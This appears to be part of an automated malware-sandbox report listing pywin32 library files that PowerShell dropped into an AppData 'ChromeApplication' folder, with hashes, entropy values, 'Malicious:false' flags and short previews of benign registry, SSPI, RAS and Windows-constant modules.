                                                                                                                                                                                                  Preview:# Magic utility that "redirects" to pywintypesxx.dll.import importlib.machinery.import importlib.util.import os.import sys...def __import_pywin32_system_module__(modname, globs):. # This has been through a number of iterations. The problem: how to. # locate pywintypesXX.dll when it may be in a number of places, and how. # to avoid ever loading it twice. This problem is compounded by the. # fact that the "right" way to do this requires win32api, but this. # itself requires pywintypesXX.. # And the killer problem is that someone may have done 'import win32api'. # before this code is called. In that case Windows will have already. # loaded pywintypesXX as part of loading win32api - but by the time. # we get here, we may locate a different one. This appears to work, but. # then starts raising bizarre TypeErrors complaining that something. # is not a pywintypes type when it clearly is!.. # So in what we hope is the last major iteration of this, we now

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\rasutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1724
                                                                                                                                                                                                  Entropy (8bit):4.998195255193026
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:75h575T5L0y5T5Z5HZ5r5R5dL5/5X5OI5cy5X5h5+HkJ5EO5g0587O5D5/5575ch:7b1dh1TLVjf5pB9xLgHkJyO+067OtbFW
                                                                                                                                                                                                  MD5:5DEDB350BE4D6433395E5A20DD87CCD9
                                                                                                                                                                                                  SHA1:3B0C06BEB7F09AAFD16D9B76266C1D942A1AEA56
                                                                                                                                                                                                  SHA-256:163BA151CB3D18957BDFC6FCECD5B733F679BCCD6F7E70A902E9327AE0152546
                                                                                                                                                                                                  SHA-512:F43F5E3436E00447808737D1A2EF3BBD1817FD9F53066707552154A9747BC3B77861C4EDB9E398D15B46E4B946F8B62E7392D28BE3F0199C12AA2E188055987A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32ras..stateStrings = {. win32ras.RASCS_OpenPort: "OpenPort",. win32ras.RASCS_PortOpened: "PortOpened",. win32ras.RASCS_ConnectDevice: "ConnectDevice",. win32ras.RASCS_DeviceConnected: "DeviceConnected",. win32ras.RASCS_AllDevicesConnected: "AllDevicesConnected",. win32ras.RASCS_Authenticate: "Authenticate",. win32ras.RASCS_AuthNotify: "AuthNotify",. win32ras.RASCS_AuthRetry: "AuthRetry",. win32ras.RASCS_AuthCallback: "AuthCallback",. win32ras.RASCS_AuthChangePassword: "AuthChangePassword",. win32ras.RASCS_AuthProject: "AuthProject",. win32ras.RASCS_AuthLinkSpeed: "AuthLinkSpeed",. win32ras.RASCS_AuthAck: "AuthAck",. win32ras.RASCS_ReAuthenticate: "ReAuthenticate",. win32ras.RASCS_Authenticated: "Authenticated",. win32ras.RASCS_PrepareForCallback: "PrepareForCallback",. win32ras.RASCS_WaitForModemReset: "WaitForModemReset",. win32ras.RASCS_WaitForCallback: "WaitForCallback",. win32ras.RASCS_Projected: "Projected",. w

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\regcheck.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4484
                                                                                                                                                                                                  Entropy (8bit):4.387225499230269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:CDAgwu0aLSqlU0HNrIvqtHR4jUa6wRyC6jSJU9zyoMuMw2mS2Sr33bD8:QAHwq0Sgx4zHPlr33bD8
                                                                                                                                                                                                  MD5:CFA098F4BF2CBC4604EA85902A1FA94A
                                                                                                                                                                                                  SHA1:C84C5E01878ED40FC2BC8EA6EE7065EB9D8694F8
                                                                                                                                                                                                  SHA-256:4513AC3EB7FEE4A80B0D285FA881B94CD1490C17C7C293349976EB7FC0BB5EF3
                                                                                                                                                                                                  SHA-512:8FEAF8C8A4A93E64ACBAF22431CAA77D74F17E53D317665E593CCF9265C513B798A95B28FF7ED2272C6C5CF568A199C5DCB4897BD40159E70C64DDC792CF540B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This module is very old and useless in this day and age! It will be.# removed in a few years (ie, 2009 or so...)..import warnings..warnings.warn(. "The regcheck module has been pending deprecation since build 210",. category=PendingDeprecationWarning,.)..import os.import sys..import regutil.import win32api.import win32con...def CheckRegisteredExe(exename):. try:. os.stat(. win32api.RegQueryValue(. regutil.GetRootKey(), regutil.GetAppPathsKey() + "\\" + exename. ). ). # .except SystemError:. except (os.error, win32api.error):. print("Registration of %s - Not registered correctly" % exename)...def CheckPathString(pathString):. for path in pathString.split(";"):. if not os.path.isdir(path):. return "'%s' is not a valid directory!" % path. return None...def CheckPythonPaths(verbose):. if verbose:. print("Python Paths:"). # Check the core path. if verbose:. print("\tCor

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\regutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12341
                                                                                                                                                                                                  Entropy (8bit):4.867163934678907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:s0Nxfa7aaG6JxIJ/Erq2K5I0OwWhwA4ob67joc2klFaD4rYtbl:s0NxCmaG6JxIJ/Er25I0OwWhwA4ob67g
                                                                                                                                                                                                  MD5:2526CDC3EE6341EC163D8C4A1682279C
                                                                                                                                                                                                  SHA1:9C59136C2F1510EDCF495F951A32A0EEA63C6275
                                                                                                                                                                                                  SHA-256:0E4EC545FA05064142368E6501152DC290520675343149F299BBE994D6C5B65D
                                                                                                                                                                                                  SHA-512:7A26252FEC5FB54A89C10AD26EABFD7BECFF1FB7F9336157E3657497C16D000011DD981C5DAE2A086DCD96FE99A4FA46CD908BCA07645D247800643BAEE7D796
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Some registry helpers..import os.import sys..import win32api.import win32con..error = "Registry utility error"..# A .py file has a CLSID associated with it (why? - dunno!).CLSIDPyFile = "{b51df050-06ae-11cf-ad3b-524153480001}"..RegistryIDPyFile = "Python.File" # The registry "file type" of a .py file.RegistryIDPycFile = "Python.CompiledFile" # The registry "file type" of a .pyc file...def BuildDefaultPythonKey():. """Builds a string containing the path to the current registry key... The Python registry key contains the Python version. This function. uses the version of the DLL used by the current process to get the. registry key currently in use.. """. return "Software\\Python\\PythonCore\\" + sys.winver...def GetRootKey():. """Retrieves the Registry root in use by Python.""". keyname = BuildDefaultPythonKey(). try:. k = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyname). k.close(). return win32con.HKEY_CURRENT_USER. except

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\sspi.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15590
                                                                                                                                                                                                  Entropy (8bit):4.735360635701188
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:8EYAX708RP3gd3dP3gsfHhS3R3tFoS3Ry1OHg2TDEG9m4p2IuEIYE0x8GwOyrtPI:oALGJHuFkOv6G5zlXszHPnqj
                                                                                                                                                                                                  MD5:03D230AD5621621A0B38C15DB6B56DD0
                                                                                                                                                                                                  SHA1:D88B7924743BC73412ED75C2209BDC71CD0D3792
                                                                                                                                                                                                  SHA-256:9E9BDAB113FA4909689D17E8888090460684290E4F2D1F7C19897546C6AEDB00
                                                                                                                                                                                                  SHA-512:13B3D3478F1CCF0B746059B6E62E3A4B8FA069CB25C9A2C3F57AAF90033066B32034F6DB204143717D986972ED261E627B4C03D26EBEC311636A5B1249E4B419
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""".Helper classes for SSPI authentication via the win32security module...SSPI authentication involves a token-exchange "dance", the exact details.of which depends on the authentication provider used. There are also.a number of complex flags and constants that need to be used - in most.cases, there are reasonable defaults...These classes attempt to hide these details from you until you really need.to know. They are not designed to handle all cases, just the common ones..If you need finer control than offered here, just use the win32security.functions directly..""".# Based on Roger Upole's sspi demos..# $Id$.import sspicon.import win32security..error = win32security.error...class _BaseAuth(object):. def __init__(self):. self.reset().. def reset(self):. """Reset everything to an unauthorized state""". self.ctxt = None. self.authenticated = False. self.initiator_name = None. self.service_name = None.. # The next seq_num for an encry

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\sspicon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15697
                                                                                                                                                                                                  Entropy (8bit):5.075827160638741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OcR7K/jSxpilZaMpRwnrvrzRIfPKCl60J0:OclaVwnrvrzfClrC
                                                                                                                                                                                                  MD5:9453DC2AD38FC69224C077BD945110D7
                                                                                                                                                                                                  SHA1:10D2438CA799BDDB8C59218EA12A1E68A321B66D
                                                                                                                                                                                                  SHA-256:403A89B99178441B8769DE753EF98447F73598F52E30701C81A37E4477B340E0
                                                                                                                                                                                                  SHA-512:70071F01B293949ACFA09C7909005363D5832A66FF9A1B43EA00B55A517CE6E2D566FC3B6068A932E19E0355EDA339427CE7BCD7A53568F19FBBEB19AE4C7475
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from c:\microsoft sdk\include\sspi.h.ISSP_LEVEL = 32.ISSP_MODE = 1...def SEC_SUCCESS(Status):. return (Status) >= 0...SECPKG_FLAG_INTEGRITY = 1.SECPKG_FLAG_PRIVACY = 2.SECPKG_FLAG_TOKEN_ONLY = 4.SECPKG_FLAG_DATAGRAM = 8.SECPKG_FLAG_CONNECTION = 16.SECPKG_FLAG_MULTI_REQUIRED = 32.SECPKG_FLAG_CLIENT_ONLY = 64.SECPKG_FLAG_EXTENDED_ERROR = 128.SECPKG_FLAG_IMPERSONATION = 256.SECPKG_FLAG_ACCEPT_WIN32_NAME = 512.SECPKG_FLAG_STREAM = 1024.SECPKG_FLAG_NEGOTIABLE = 2048.SECPKG_FLAG_GSS_COMPATIBLE = 4096.SECPKG_FLAG_LOGON = 8192.SECPKG_FLAG_ASCII_BUFFERS = 16384.SECPKG_FLAG_FRAGMENT = 32768.SECPKG_FLAG_MUTUAL_AUTH = 65536.SECPKG_FLAG_DELEGATION = 131072.SECPKG_FLAG_READONLY_WITH_CHECKSUM = 262144.SECPKG_ID_NONE = 65535..SECBUFFER_VERSION = 0.SECBUFFER_EMPTY = 0.SECBUFFER_DATA = 1.SECBUFFER_TOKEN = 2.SECBUFFER_PKG_PARAMS = 3.SECBUFFER_MISSING = 4.SECBUFFER_EXTRA = 5.SECBUFFER_STREAM_TRAILER = 6.SECBUFFER_STREAM_HEADER = 7.SECBUFFER_NEGOTIATION_INFO = 8.SECBUFFER_PADDING = 9

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win2kras.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):334
                                                                                                                                                                                                  Entropy (8bit):4.571035255295966
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:SD4cBz3TqzKdD6Le/VieikwcBTAZ7XGap/892EtQCR6Uh286AI/kJln:A4cBeur/I8TBclvW2+sWl0kJl
                                                                                                                                                                                                  MD5:ABBC2A410CB902383B0DCC308BE715F3
                                                                                                                                                                                                  SHA1:9E177FF30F49DB4F20145671B5C9F88B278D3C3E
                                                                                                                                                                                                  SHA-256:F0467A1CA6FFC066C7ED283CDAE5D2EA76AEFE5B9CC21C3FE096B5D28C23765A
                                                                                                                                                                                                  SHA-512:3F5E10EF7C44FE6EF61ECD1CFB0FED21F5D9448C98291485917E0491F4F6EC904131894CA4D8E2425F08FA2FC18210CA4FB32191E8AB3336A9223A6DFB6AC5D9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# win2kras used to be an extension module with wrapped the "new" RAS functions.# in Windows 2000, so win32ras could still be used on NT/etc..# I think in 2021 we can be confident pywin32 is not used on earlier OSs, so.# that functionality is now in win32ras..#.# This exists just to avoid breaking old scripts..from win32ras import *.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32con.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):117047
                                                                                                                                                                                                  Entropy (8bit):5.102756787103929
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:aYLzODfYiXGYvTVkcgURPpp0kcNXj3s1VrzieuVoIOSGrv+I23pwkeJyUYziNubq:BjVOmcgUbpSJjI1GeuDGv+rINubI2s
                                                                                                                                                                                                  MD5:6D9449506328201C05E643B0D4E65EA1
                                                                                                                                                                                                  SHA1:D1F20BB6928C5A6B4DE0EF48CC380D113C61AA90
                                                                                                                                                                                                  SHA-256:7DB98CEDA5CD93A5954A5434BD0D77A34825EC772400ED67037A8C87838BDDC7
                                                                                                                                                                                                  SHA-512:0209E9D59EFE0B2890CC5BBCEB1B447F408CA4BC84313B8E8A8C1B9235761A4EF15C5E737B626B1AE81D6CD4A39F194682227E415F30D664F15B5FCC06B28449
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from commdlg.h (plus modifications 4jan98).WINVER = 1280.WM_USER = 1024.PY_0U = 0.OFN_READONLY = 1.OFN_OVERWRITEPROMPT = 2.OFN_HIDEREADONLY = 4.OFN_NOCHANGEDIR = 8.OFN_SHOWHELP = 16.OFN_ENABLEHOOK = 32.OFN_ENABLETEMPLATE = 64.OFN_ENABLETEMPLATEHANDLE = 128.OFN_NOVALIDATE = 256.OFN_ALLOWMULTISELECT = 512.OFN_EXTENSIONDIFFERENT = 1024.OFN_PATHMUSTEXIST = 2048.OFN_FILEMUSTEXIST = 4096.OFN_CREATEPROMPT = 8192.OFN_SHAREAWARE = 16384.OFN_NOREADONLYRETURN = 32768.OFN_NOTESTFILECREATE = 65536.OFN_NONETWORKBUTTON = 131072.OFN_NOLONGNAMES = 262144.OFN_EXPLORER = 524288 # new look commdlg.OFN_NODEREFERENCELINKS = 1048576.OFN_LONGNAMES = 2097152 # force long names for 3.x modules.OFN_ENABLEINCLUDENOTIFY = 4194304 # send include message to callback.OFN_ENABLESIZING = 8388608.OFN_DONTADDTORECENT = 33554432.OFN_FORCESHOWHIDDEN = 268435456 # Show All files including System and hidden files.OFN_EX_NOPLACESBAR = 1.OFN_SHAREFALLTHROUGH = 2.OFN_SHARENOWARN = 1.OFN_SHAREWARN = 0.CDN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32cryptcon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72494
                                                                                                                                                                                                  Entropy (8bit):5.132765035748773
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:GUR6nCUZch1pYy64OZWA+PrZ6rBn3CDx5vF9hNJx4GIGZKngFLf0nLVNaRB56oBp:/3YqDMrBn3Ctv4A
                                                                                                                                                                                                  MD5:DCC36C5E07BA223144EDC9DA143C5631
                                                                                                                                                                                                  SHA1:06CA43F7B6F208F32E1B9A7F0D97785A65FE333C
                                                                                                                                                                                                  SHA-256:4E3B2ACAE1B0ACE6DBAFB5ADE99048879F75275423063247BE25FE4749D23EAD
                                                                                                                                                                                                  SHA-512:CBEBE171A15DA44AF86F8EA2CBED90B5614928EA1136EB34030AAADBA2A399C36445FFACD8B3CF6A8A2CB41E923C26330303F0E29F1D4BF431562E3C89559C70
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from WinCrypt.h.def GET_ALG_CLASS(x):. return x & (7 << 13)...def GET_ALG_TYPE(x):. return x & (15 << 9)...def GET_ALG_SID(x):. return x & (511)...ALG_CLASS_ANY = 0.ALG_CLASS_SIGNATURE = 1 << 13.ALG_CLASS_MSG_ENCRYPT = 2 << 13.ALG_CLASS_DATA_ENCRYPT = 3 << 13.ALG_CLASS_HASH = 4 << 13.ALG_CLASS_KEY_EXCHANGE = 5 << 13.ALG_CLASS_ALL = 7 << 13.ALG_TYPE_ANY = 0.ALG_TYPE_DSS = 1 << 9.ALG_TYPE_RSA = 2 << 9.ALG_TYPE_BLOCK = 3 << 9.ALG_TYPE_STREAM = 4 << 9.ALG_TYPE_DH = 5 << 9.ALG_TYPE_SECURECHANNEL = 6 << 9.ALG_SID_ANY = 0.ALG_SID_RSA_ANY = 0.ALG_SID_RSA_PKCS = 1.ALG_SID_RSA_MSATWORK = 2.ALG_SID_RSA_ENTRUST = 3.ALG_SID_RSA_PGP = 4.ALG_SID_DSS_ANY = 0.ALG_SID_DSS_PKCS = 1.ALG_SID_DSS_DMS = 2.ALG_SID_DES = 1.ALG_SID_3DES = 3.ALG_SID_DESX = 4.ALG_SID_IDEA = 5.ALG_SID_CAST = 6.ALG_SID_SAFERSK64 = 7.ALG_SID_SAFERSK128 = 8.ALG_SID_3DES_112 = 9.ALG_SID_CYLINK_MEK = 12.ALG_SID_RC5 = 13.ALG_SID_AES_128 = 14.ALG_SID_AES_192 = 15.ALG_SID_AES_256 = 16.ALG_SID_AES = 17.ALG_SID_

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32evtlogutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7612
                                                                                                                                                                                                  Entropy (8bit):4.617430807608831
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xjfuaURPBUS3onZz6vxVjomyWdLKHUoUNeSm/oGLoFXkPa1mPeeSm6C:xjARPqS3onZz6JVjomLdeHZUYP3Loa+u
                                                                                                                                                                                                  MD5:4056059DA5B13E78304894A5DEC5A3EF
                                                                                                                                                                                                  SHA1:7223224E6D80F2265E531976843061A344D0202A
                                                                                                                                                                                                  SHA-256:92803137353DA3AB0554FF8980F532BDFD994718E0C76BBEBE1DDA72772ACFCC
                                                                                                                                                                                                  SHA-512:1148427CDC915EAD9F942A0DCFCFE47BFF784110630CEB202E9F43C0A787282FF926A434D1229C8837B847A4E604DF6A7F09708B1D28C1248889453AD28D8781
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Event Log Utilities - helper for win32evtlog.pyd."""..import win32api.import win32con.import win32evtlog.import winerror..error = win32api.error # The error the evtlog module raises...langid = win32api.MAKELANGID(win32con.LANG_NEUTRAL, win32con.SUBLANG_NEUTRAL)...def AddSourceToRegistry(. appName,. msgDLL=None,. eventLogType="Application",. eventLogFlags=None,. categoryDLL=None,. categoryCount=0,.):. """Add a source of messages to the event log... Allows Python program to register a custom source of messages in the. registry. You must also provide the DLL name that has the message table, so the. full message text appears in the event log... Note that the win32evtlog.pyd file has a number of string entries with just "%1". built in, so many Python programs can simply use this DLL. Disadvantages are that. you do not get language translation, and the full text is stored in the event log,. blowing the size of the log up.. """.. # When an

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32gui_struct.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30127
                                                                                                                                                                                                  Entropy (8bit):4.825689367996127
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:bECgvkVU6pyZ3N9UmZxqoMUHyMSrU4AGvoDwOSdV9aaZDgKh:bEdAwZ375Zux6mdIKh
                                                                                                                                                                                                  MD5:B07124FDD02BB98B79FA59067C88927E
                                                                                                                                                                                                  SHA1:7AE2C2F6EFE5CE004C10B993F2DEAD988DDAED9A
                                                                                                                                                                                                  SHA-256:EBE1F5BC059EA1B530E701EA649EF8644E09785B72AB1866DF6977C8C0D7A1B4
                                                                                                                                                                                                  SHA-512:9798EE222E0E5D98DAFDB4A103C91D6B0AB98D6BE75EBA9B945FD663E9FC0036AB6C3F62630ACED21B168C548D1DDDD3DBA024B4302DB8B97891F450C19B0CBA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is a work in progress - see Demos/win32gui_menu.py..# win32gui_struct.py - helpers for working with various win32gui structures..# As win32gui is "light-weight", it does not define objects for all possible.# win32 structures - in general, "buffer" objects are passed around - it is.# the callers responsibility to pack the buffer in the correct format..#.# This module defines some helpers for the commonly used structures..#.# In general, each structure has 3 functions:.#.# buffer, extras = PackSTRUCTURE(items, ...).# item, ... = UnpackSTRUCTURE(buffer).# buffer, extras = EmtpySTRUCTURE(...).#.# 'extras' is always items that must be held along with the buffer, as the.# buffer refers to these object's memory..# For structures that support a 'mask', this mask is hidden from the user - if.# 'None' is passed, the mask flag will not be set, or on return, None will.# be returned for the value if the mask is not set..#.# NOTE: I considered making these structures look like real classes, a

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32inetcon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):43217
                                                                                                                                                                                                  Entropy (8bit):4.6681753612382915
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:yQbVsdBQqM8dX/A8G3gu0CIHq4Wo5MGJ0hii1/dK2iy0rM:yQbqtX/A8Gwu0CIHq4Wo5MGJ0H0rM
                                                                                                                                                                                                  MD5:3E80C82D1405D405BE8010FA6040C732
                                                                                                                                                                                                  SHA1:F34649F7F1998CC0E88D73615DC97D3ED8B26EFA
                                                                                                                                                                                                  SHA-256:141EE8BBE50251222119936B059936FCA0108A8F53F25D8C8D76172A73DB688F
                                                                                                                                                                                                  SHA-512:7994A0F197AD1B6308B34AAACAAB612D24B89A5CA50D0E9B9043F5DB8C07C29BFA1D85735AEA573B8879C8F99C286B328DA277AFE590EB5539994FA9B0BA101B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from \mssdk\include\WinInet.h..INTERNET_INVALID_PORT_NUMBER = 0.INTERNET_DEFAULT_PORT = 0.INTERNET_DEFAULT_FTP_PORT = 21.INTERNET_DEFAULT_GOPHER_PORT = 70.INTERNET_DEFAULT_HTTP_PORT = 80.INTERNET_DEFAULT_HTTPS_PORT = 443.INTERNET_DEFAULT_SOCKS_PORT = 1080.INTERNET_MAX_HOST_NAME_LENGTH = 256.INTERNET_MAX_USER_NAME_LENGTH = 128.INTERNET_MAX_PASSWORD_LENGTH = 128.INTERNET_MAX_PORT_NUMBER_LENGTH = 5.INTERNET_MAX_PORT_NUMBER_VALUE = 65535.INTERNET_MAX_PATH_LENGTH = 2048.INTERNET_MAX_SCHEME_LENGTH = 32.INTERNET_KEEP_ALIVE_ENABLED = 1.INTERNET_KEEP_ALIVE_DISABLED = 0.INTERNET_REQFLAG_FROM_CACHE = 0x00000001.INTERNET_REQFLAG_ASYNC = 0x00000002.INTERNET_REQFLAG_VIA_PROXY = 0x00000004.INTERNET_REQFLAG_NO_HEADERS = 0x00000008.INTERNET_REQFLAG_PASSIVE = 0x00000010.INTERNET_REQFLAG_CACHE_WRITE_DISABLED = 0x00000040.INTERNET_REQFLAG_NET_TIMEOUT = 0x00000080.INTERNET_FLAG_RELOAD = -2147483648.INTERNET_FLAG_RAW_DATA = 0x40000000.INTERNET_FLAG_EXISTING_CONNECT = 0x20000000.INTERNET_

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32netcon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18532
                                                                                                                                                                                                  Entropy (8bit):4.901387880502849
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:XFerFC+a4nQVCUc66U5ICst7fPbeK/EZzQ8SLT9Bc7rzrLTgH4k0:ccCUc66U5ICstT/EpZ7v3L
                                                                                                                                                                                                  MD5:270657C418E28DF9E73D1696C20FA02D
                                                                                                                                                                                                  SHA1:3CF6B740CEF32D322F474FC2F0CF2B90031531B2
                                                                                                                                                                                                  SHA-256:7DC59BBF74413E8951D199A9DE1B7DDAFE027FB1244C813F2DBD3DF3841AE80E
                                                                                                                                                                                                  SHA-512:2AA93F6E05ABBA165CFD7F72E8ADC5DC0C7FFD7FD3C5AC8F762E5D6C2F40FA619469A9757185163208B7594869FC7D2755026D8AECE5AFCBB6BAD4F4C1A746E0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from lmaccess.h..# Included from lmcons.h.CNLEN = 15.LM20_CNLEN = 15.DNLEN = CNLEN.LM20_DNLEN = LM20_CNLEN.UNCLEN = CNLEN + 2.LM20_UNCLEN = LM20_CNLEN + 2.NNLEN = 80.LM20_NNLEN = 12.RMLEN = UNCLEN + 1 + NNLEN.LM20_RMLEN = LM20_UNCLEN + 1 + LM20_NNLEN.SNLEN = 80.LM20_SNLEN = 15.STXTLEN = 256.LM20_STXTLEN = 63.PATHLEN = 256.LM20_PATHLEN = 256.DEVLEN = 80.LM20_DEVLEN = 8.EVLEN = 16.UNLEN = 256.LM20_UNLEN = 20.GNLEN = UNLEN.LM20_GNLEN = LM20_UNLEN.PWLEN = 256.LM20_PWLEN = 14.SHPWLEN = 8.CLTYPE_LEN = 12.MAXCOMMENTSZ = 256.LM20_MAXCOMMENTSZ = 48.QNLEN = NNLEN.LM20_QNLEN = LM20_NNLEN.ALERTSZ = 128.NETBIOS_NAME_LEN = 16.CRYPT_KEY_LEN = 7.CRYPT_TXT_LEN = 8.ENCRYPTED_PWLEN = 16.SESSION_PWLEN = 24.SESSION_CRYPT_KLEN = 21.PARMNUM_ALL = 0.PARM_ERROR_NONE = 0.PARMNUM_BASE_INFOLEVEL = 1000.NULL = 0.PLATFORM_ID_DOS = 300.PLATFORM_ID_OS2 = 400.PLATFORM_ID_NT = 500.PLATFORM_ID_OSF = 600.PLATFORM_ID_VMS = 700.MAX_LANMAN_MESSAGE_ID = 5799.UF_SCRIPT = 1.UF_ACCOUNTDISABLE = 2.UF_HOMEDIR_

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\win32pdhquery.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23345
                                                                                                                                                                                                  Entropy (8bit):4.411538185872905
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+FzU1rmtmzoAVnZj1lkYZwErcrxEJ4zU4CrML/nZj7mnRJMhA/NL5YTYA5x+W:iz0mozoAFZ+rxC444Cr8/Zg7BNL5YJ1
                                                                                                                                                                                                  MD5:BF0D2114EDDEEBD1CE68A9EAE89B816F
                                                                                                                                                                                                  SHA1:E1A693DCA326553D9C721EF87B989EC2F7F03855
                                                                                                                                                                                                  SHA-256:B0003F4A62C0423ED5FCE784CC2DAFD46D4326FF3779C38CC6B41514785DAAA2
                                                                                                                                                                                                  SHA-512:A1898D94EA296110A1CF036863F3E0DF30C8570466ACDC32058FE20A6DD0091ECE254B6FE9CB290364564A5AF263DA7BF79061285AABA8D5A32728D0C8DC4BE3
                                                                                                                                                                                                  Malicious:false
